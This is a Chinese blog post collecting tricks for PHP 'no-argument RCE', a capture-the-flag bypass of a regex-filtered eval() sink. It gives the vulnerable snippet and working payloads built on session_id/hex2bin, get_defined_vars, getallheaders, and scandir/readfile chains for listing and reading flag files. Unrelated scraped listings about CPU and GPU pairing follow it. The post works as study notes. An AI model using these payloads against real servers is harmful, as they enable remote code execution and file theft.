无参数rce

最新推荐文章于 2024-11-14 08:01:14 发布
最新推荐文章于 2024-11-14 08:01:14 发布
阅读量2.2k 收藏 15
点赞数 1
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45570082/article/details/106602261
版权

总结一下无参数rce的各种解法(为了便于自己查找,同时为了把自己收藏夹的几个相关网址删掉,每次都在别人博客找很麻烦的(手动狗头))
首先准备代码

<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['a'])) {   
   	eval($_GET['a']);}

利用session_id

php中有一个函数叫session_id(),可以直接获取到cookie中的phpsessionid值,phpsessionid的组成符号有限定,不能使用 ’ () ',所以我们需要将我们要执行的命令转换成16进制,然后再通过hex2bin函数转换回去

<?php
echo bin2hex('phpinfo();');  //706870696e666f28293b

但是呢,session_id的使用需要开启session,所以需要session_start()函数
hex2bin(session_id(session_start()))
但是呢,仅仅一个eval执行上面代码只会把十六进制转换成字符串’phpinfo();’,所以我们还需要一个eval
最终
在这里插入图片描述

利用get_defined_vars ()函数

get_defined_vars():返回由所有已定义变量所组成的数组
下面我们先做一个实验

echo "<?php print_r(get_defined_vars()); ?>">4.php

在这里插入图片描述
我们通过get或者post方法传入的参数以及它的值能够通过该函数读取出来,
而get_defined_vars()返回的又是一个数组,我们能够通过php的一系列数组函数读取到该数组中任意我们想要的值

end() - 将内部指针指向数组中的最后一个元素,并输出。
next() - 将内部指针指向数组中的下一个元素,并输出。
prev() - 将内部指针指向数组中的上一个元素,并输出。
reset() - 将内部指针指向数组中的第一个元素,并输出。
each() - 返回当前元素的键名和键值,并将内部指针向前移动。

我们先尝试一下current
在这里插入图片描述
然后end
在这里插入图片描述
发现得到我们想要的字符串phpinfo();
最终payload

a=eval(end(current(get_defined_vars())));&b=phpinfo();

利用getallheaders()

getallheaders返回当前请求的所有请求头信息
直接使用
在这里插入图片描述
我是直接把Cache-Control的值改了,也可以操作其他的http头

其他的读取文件的方法

直接说利用代码吧

获得当前目录文件

var_dump(scandir(getcwd())); 
var_dump(scandir(current(localeconv()));  
var_dump(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))));    //利用三角函数和floor ceil,这个是php7下能够成功

获得上级目录文件

var_dump(scandir(dirname(getcwd())));
var_dump(scandir(chr(pos(localtime(time(chdir(next(scandir(pos(localeconv()))))))))));//这种方法理论上来说,每隔47秒才能成功执行一次
var_dump(scandir(chr(ceil(sqrt(cosh(tan(tan(tan(cosh(sinh(exp(chdir(next(scandir(pos(localeconv()))))))))))))))));

找到flag文件后的读取
如果flag是最后一个:end()
flag处于倒数第二个:next(array_reverse())
flag处于其他位置(这种靠运气):array_rand(array_flip())

附上三角函数的脚本,可以自己改一改,或者增加点函数

<?php
$list = array("ceil","sinh","cosh","tan","floor","sqrt","cos","sin");
foreach($list as $a){
foreach($list as $b){
foreach($list as $c){
foreach($list as $d){
foreach($list as $e){
foreach($list as $f){
foreach($list as $g){
foreach($list as $h){
if($a($b($c($d($e($f($g($h(phpversion())))))))) == 46)
echo "$a+$b+$c+$d+$e+$f+$g+$h"."\n";    
}}}}}}}}
?>

最后用读文件的函数读就可以了,什file_get_contents,readfile,highlight_file等等
就是这些了,以后还发现的话还会继续补充

参考链接:https://www.cnblogs.com/xhds/p/12881059.html
https://www.cnblogs.com/wangtanzhi/p/12260986.html
http://www.manongjc.com/detail/15-pkewlbdqeprvjeh.html
https://blog.youkuaiyun.com/qq_45449318/article/details/105237550
https://www.cnblogs.com/wangtanzhi/p/12311239.html

cpu并行gpu并行_搞懂GPU为什么比CPU“快”
weixin_39958019的博客
11-14 836
作者:毛大闲来源:面包板社区https://www.mianbaoban.cn/blog/3887969-407803.html近几年深度学习在各领域大显神威,而”GPU加速"也得到了越来越多的篇幅,似乎任何程序只要放到GPU上运行那速度就是杠杠的。GPU代替CPU计算已成了大势所趋?我先告诉你结论”那是不可能滴“,然后咱们再来说说”GPU为什么比CPU快“。一、图形处理,GPU的源起G...
cpugpu的区别是什么?GPU显卡吗?
PAINzw的博客
01-03 1285
cpugpu的区别是什么?GPU显卡吗? CPU,在电脑中起着控制计算机运行的作用,是电脑的中央处理器。 GPU是一个附属型的处理器,主要处理计算机中与图形计算有关的工作,并将数据更好地呈现在显示器中。 只有CPUGPU合作,才能最大程度上发挥电脑的性能。 图形处理器(英语:Graphics Processing Unit,缩写:GPU),又称显示核心、视觉处理器、显示芯片,是一种专门在个人电脑、工作站、游戏机一些移动设备(如平板电脑、智能手机等)上做图像图形相关运算工作的微处理器。
cpugpu搭配吗_再谈CPU/GPU搭配 实战老配置显卡升级
weixin_39828338的博客
12-21 885
对于经常玩游戏的人来说,显卡性能的高低直接影响着游戏中能否开启更多特效;最近几年处理器性能飞涨,使得大多数人的处理器性能都处于过剩状态。加上内存价格持续走低,大容量内存已经成为众多人的标配。因此用户在升级的时候,更多都是偏重显卡方面。在GTX680获得广大玩家认可的同时,NV旗下的“元老级”的显卡也加入了到促销大军之中。最近一段时间多款上代产品降价清仓,有升级打算的朋友不妨抓紧时间关注下。目前显卡...
计算机cpu显卡搭配要求,CPU显卡如何搭配才是合理的 显卡CPU怎么搭配...
weixin_39855658的博客
07-27 2154
CPU处理器与显卡的匹配关系即使是专业人士也无法给一个详细的分数列表来明确的说什么处理器就该配什么显卡,这个只是一个对应的经验之谈,一般是根据处理器与显卡的相应的价格定位,哪款处理器适合搭配多少价格区间的显卡,为了防止出现处理器与显卡的不平衡导致的性能瓶颈现象影响较好的处理器或者显卡的性能的发挥。当然了还有一个简单的直观方法,用Windows vista/7系统自带的Windows 体验指数对硬件...
买电脑时cpu怎么搭配显卡会更好呢 旧时光 oldtimeblog
myblogfree的博客
06-21 547
买电脑时cpu怎么搭配显卡会更好呢 很多想买电脑的人都会纠结要买什么显卡cpu好呢?要怎么搭配才会更好。 理论上,显卡CPU搭配是没有要求的,只要主板兼容,都可以使用。 一般来说,CPU显卡两者搭配并不存在兼容问题,只要主板支持,就可以使用。比如,低端CPU不仅可以搭配低端显卡,也可以搭配中端,甚至是高端显卡,反之也是一样的。 旧时光 oldtimeblog CPU显卡怎么搭配最好?关于C...
不能乱来,显卡CPU怎么搭配才合适
热门推荐
llllaaaaiiii0421的博客
03-03 1万+
如果您需要高效处理大量图形处理视频处理任务,那么选择一个高性能的 GPU 一个能够支持 GPUCPU 是比较重要的。一般而言,您可以选择更高配置的 CPU 来支持更高性能的 GPU,或选择更高配置的 GPU 来支持更高性能的 CPU。请注意,以上推荐的配置仅是具体的例子,实际的配置需要根据您的具体需求预算来确定。如果您需要执行大量的数值计算文字处理任务,那么高性能的 CPU 是更重要的。显卡 (GPU) CPU 之间的搭配主要取决于您的计算需求。
CPU显卡GPU修改型号工具
05-22
描述中提到,“通过批处理源码程序修改CPUGPU显卡的任意型号”,这表明该工具可能基于批处理脚本语言编写,这种语言允许用户通过简单的命令行指令批量执行任务。批处理程序能够与系统进行交互,修改注册表或其他...
Part 6 CPU显卡的合理搭配.pdf
09-24
CPU(中央处理器)显卡(Graphics Processing Unit,GPU)是电脑系统中的两个核心组件,它们之间的搭配对电脑的性能效率产生着至关重要的影响。本文将详细介绍CPU显卡的合理搭配,从硬件选择到实际应用,提供...
CPU & GPU检测工具,Cpu-Z CPU检测软件,GPU-Z 看清显卡的各项参数 GPU识别工具
01-13
Cpu-Z 是一款计算机的CPU检测软件。Cpu-Z适用于任意品牌型号的监测工作,且检测的数据范围非常广泛、全面,将CPU涉及到的各个方面都...CPU & GPU检测工具,Cpu-Z CPU检测软件,GPU-Z 看清显卡的各项参数 GPU识别工具
主板显卡是如何给CPU_GPU供电的.pdf
09-24
"主板显卡是如何给CPU_GPU供电的.pdf" 在计算机系统中,主板显卡是两个非常重要的组件,它们对CPUGPU提供稳定、纯净的电流,以确保系统的正常运作。主板显卡上的供电模块是如何工作的?它们是如何提供稳定...
计算机cpu显卡搭配要求,CPU显卡怎么搭配显卡CPU搭配有什么要求吗...
weixin_36165880的博客
07-27 7053
对于diy装机来说,大多数朋友预算都是花在cpu显卡这两大最核心硬件上,其中cpu绝对电脑运算速度,而显卡则决定着电脑图形性能,因此cpu显卡是绝对电脑性能最核心的两大硬件。那么cpu显卡怎么搭配好?显卡cpu搭配有什么要求吗?下面小编一起来看看吧。显卡cpu搭配有要求吗?理论上,显卡cpu搭配是没有要求的,只要主板兼容,都可以使用。一般来说,cpu显卡两者搭配并不存在兼容问题,只...
cpugpu搭配吗_显卡CPU搭配有要求吗 CPU显卡怎么搭配最好?
weixin_31898831的博客
12-30 1009
对于DIY装机来说,大多数朋友预算都是花在CPU显卡这两大最核心硬件上,其中CPU绝对电脑运算速度,而显卡则决定着电脑图形性能,因此CPU显卡是绝对电脑性能最核心的两大硬件。那么,显卡CPU搭配有要求吗?CPU显卡怎么搭配才是最好呢?下面“百事数码”就来聊聊这个不少小白朋友容易纠结的这两个问题。显卡CPU搭配有要求吗?理论上,显卡CPU搭配是没有要求的,只要主板兼容,都可以使用。一般来...
cpugpu搭配吗_显卡CPU可以随便搭配?
weixin_42377742的博客
12-30 4584
从理论上来说,CPUGPU是可以随意搭配,没有什么限制,只要主板支持就可以了,但是在实际操作的时候,你会发现事情没有那么简单。办公的时候,一块双核四线程的速龙200EG就可以满足,自带的核显也可以点亮电脑,那么我们就没有必要在插上一块独显,哪怕是最便宜的独显也是浪费,因为他不需要。游戏的时候,你在玩吃鸡游戏,你就需要最低四核四线程的I3 8100或者锐龙1200加上GTX1050或者RX560让...
CPU显卡搭配
weixin_33895657的博客
04-04 281
对于游戏来说,投入100块在CPU上面投入100块在显卡上面,肯定的说后者效果要明显一些。CPU本身显卡是分开两部分计算的,CPU负责游戏控制,而显卡负责图形运算。实际就三种状态:1、CPU显卡弱,结果就是游戏本身流畅运算,不会有按键卡顿之类的现象,但是显卡跳帧。2、CPU显卡相当,结果自然是显卡正常发挥性能!(注意,CPU在匹配显卡也不会超长发挥)3、CPU显卡强...
游戏生产力两不误!CPU显卡如何搭配更合理,小白直呼学到了!
二爷记
11-14 2768
在DIY装机中,显卡是整机预算中的大头,占比非常高,合理的装机方案肯定是根据用途来选择显卡,有什么样的需求,就选择什么性能的显卡。从需求用途使用场景上来划分,有四种需求使用场景,包括办公家用、畅玩网游/设计作图、畅玩游戏/重度设计、顶级电竞/建模渲染,越往后,对于显卡CPU的性能需求就越高,为了便于理解,下面就列举了四个需求场景下的典型显卡搭配方案供参考选择。关注我,后续分享更多精彩内容!...
cpugpu搭配吗_高端显卡一定要配高档CPU吗?
weixin_39809175的博客
01-12 559
也许是最近显卡价钱回落的原因,最近装机的朋友特别多,很多新手都在咨询装机问题,但是很多人在问话的时候会有一些比较常见的误区,今天来总结一下。注意:小标题写的是误区,所以是错误的,别当成正确的来看啊。误区1.新系列产品都比老系列产品好这点发生最多的就是i7.i5.i3之间了,自己装机的朋友有时候对CPU的型号挺在意的,很多都以为i7>i5>i3,其实同一代,同核心的i7到i3,虽然因为频...
普通计算机硬件cpu,DIY硬件搭配技巧:组装电脑如何搭配CPU显卡才最合适?
weixin_35688354的博客
07-21 3040
我们在组装电脑选配DIY硬件的时候,最为关心的硬件就是CPU显卡,对于游戏玩家来说,显卡的重要性要超越CPU,对于如何搭配CPU显卡才最合适的话题,依然是一个热门的话题。下面装机之家简单明了来说说如何搭配CPU显卡才适合、均衡合理。说显卡CPU搭配以前,小编先来说说关于内存、主板、硬盘、电源、显示器等硬件简单介绍。对于大多数用户来说,在目前主板实际性能差异并不大,内存都是4GB起跳,主流内...
cpugpu搭配吗_CPUGPU合理搭配 整机性能当然不俗
weixin_30405507的博客
01-12 1086
·CPUGPU合理搭配 整机性能当然不俗配置方面,神舟精盾K580采用Intel i5 450M双核四线程处理器,其拥有2.40GHz的主频,睿频加速可达2.66GHz,3MB三级缓存。NVIDIA GeForce 445M的独立显卡其具体参数及性能表现先前已为大家详细介绍过,这里不再多说。此外,4GB的内存以及500GB 5400转硬盘的配备也是当今主流。Windows 7自检分数截图通过Wi...
pytorch可以同时安装cpugpu吗?
最新发布
03-15
<think>好的,我现在需要回答用户关于PyTorch是否支持同时安装CPUGPU版本的问题。首先,我应该回顾一下PyTorch的安装机制。根据用户提供的引用资料,安装GPU版本的PyTorch通常需要特定的CUDA版本,并且用户可能需要通过不同的渠道获取对应的whl文件,比如从官网或镜像源下载[^2][^3][^5]。 接下来,我需要理解CPUGPU版本的区别。CPU版本是运行在处理器上的,而GPU版本需要NVIDIA的CUDA支持,利用显卡加速计算。两者在安装包上有不同的依赖项库文件,例如GPU版本会包含CUDA相关的库,而CPU版本则没有这些。 然后,我考虑是否可以在同一个环境中同时安装两个版本。根据经验,Python的包管理通常不允许同一个包的不同版本共存,因为包名称相同(如torch)会导致冲突。用户提供的引用中提到,如果强行安装不同版本的torch,可能会覆盖现有安装,导致不可预期的问题[^4][^5]。例如,如果先安装CPU版本,再安装GPU版本,后者会覆盖前者,反之亦然。 此外,用户可能需要同时使用两种环境的情况,比如在没有GPU的机器上运行CPU代码,而在有GPU的机器上运行加速代码。这时,使用虚拟环境(如conda或venv)分别创建独立的环境可能更合适。每个环境可以安装对应的PyTorch版本,避免冲突[^1][^3]。 还有一个考虑点是PyTorch的设计是否支持同时加载两个版本的库。通常,在运行时,PyTorch会检测可用的CUDA设备,并自动使用GPU版本。如果安装了GPU版本,即使代码中没有显式调用CUDA函数,PyTorch也会优先使用GPU资源。因此,同时安装两个版本不仅技术上不可行,也没有实际必要,因为GPU版本已经包含CPU功能。 最后,我需要总结这些信息,给出清晰的回答,并建议用户使用虚拟环境来管理不同版本的PyTorch,确保项目的兼容性稳定性。</think>PyTorch无法在同一个Python环境中同时安装CPUGPU版本。以下是具体分析及解决方案: ### 一、版本冲突机制 PyTorch的CPUGPU版本通过包名`torch`进行统一管理。安装时会根据后缀(如`cuXXX`表示CUDA版本)决定具体类型: - CPU版本:例如`torch-1.10.0-cp37-cp37m-win_amd64.whl` - GPU版本:例如`torch-1.10.0+cu113-cp37-cp37m-win_amd64.whl` 由于包名相同,后安装的版本会直接覆盖前一个版本[^4]。例如: ```bash # 先安装CPU版本 pip install torch==1.10.0 # 再安装GPU版本会导致覆盖 pip install torch==1.10.0+cu113 ``` ### 二、推荐解决方案 使用虚拟环境隔离不同需求: 1. **Conda环境管理**(推荐): ```bash # 创建GPU环境 conda create -n pytorch_gpu python=3.8 conda activate pytorch_gpu pip install torch torchvision --extra-index-url https://download.pytorch.org/whl/cu113 # 创建CPU环境 conda create -n pytorch_cpu python=3.8 conda activate pytorch_cpu pip install torch torchvision ``` 通过`conda activate`切换环境即可[^3] 2. **Docker容器方案**: ```dockerfile # GPU容器 FROM pytorch/pytorch:1.10.0-cuda11.3-cudnn8-runtime # CPU容器 FROM pytorch/pytorch:1.10.0-cpu ``` ### 三、版本兼容性验证 安装后可通过以下代码检测当前环境版本: ```python import torch print(torch.__version__) # 输出如1.10.0+cpu或1.10.0+cu113 print(torch.cuda.is_available()) # GPU版本返回True ``` ### 四、特殊需求处理 若需在GPU版本中使用CPU模式,可直接通过代码指定设备: ```python device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") tensor = torch.randn(3,3).to(device) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值